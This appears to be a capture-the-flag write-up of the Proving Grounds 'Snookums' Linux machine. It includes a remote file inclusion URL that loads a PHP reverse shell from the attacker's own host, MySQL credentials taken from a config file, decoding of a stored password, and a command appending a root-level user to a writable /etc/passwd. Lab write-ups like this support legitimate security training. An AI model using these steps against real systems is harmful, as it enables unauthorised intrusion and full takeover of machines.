Snookums

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

Autorecon revealed open ports:
- FTP (21)
- SSH (22)
- HTTP (80)
- RPC (111)
- SMB (139 & 445)
- MySQL (3306 & 33060)
Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.

A version number at the bottom screamed "vulnerable." Searching for CVEs led me to EDB-ID 48424 (no CVE assigned), an RFI vulnerability in the img parameter:

http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php

I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as apache.

Uploaded linpeas.sh, which flagged a PHP config file containing MySQL credentials: root:MalapropDoffUtilize1337.

mysql -u root -p

Found the SimplePHPGal database. That had a users table with 3 users alongside their encoded passwords, I picked the user michael since it was the one that's in the home directory.

echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d

I then switched to michael and re-ran linpeas.sh, which revealed writable /etc/passwd.

It means we can add a new user as root. I generated a password hash for "pwned":

openssl passwd pwned

echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd

Last updated 10 months ago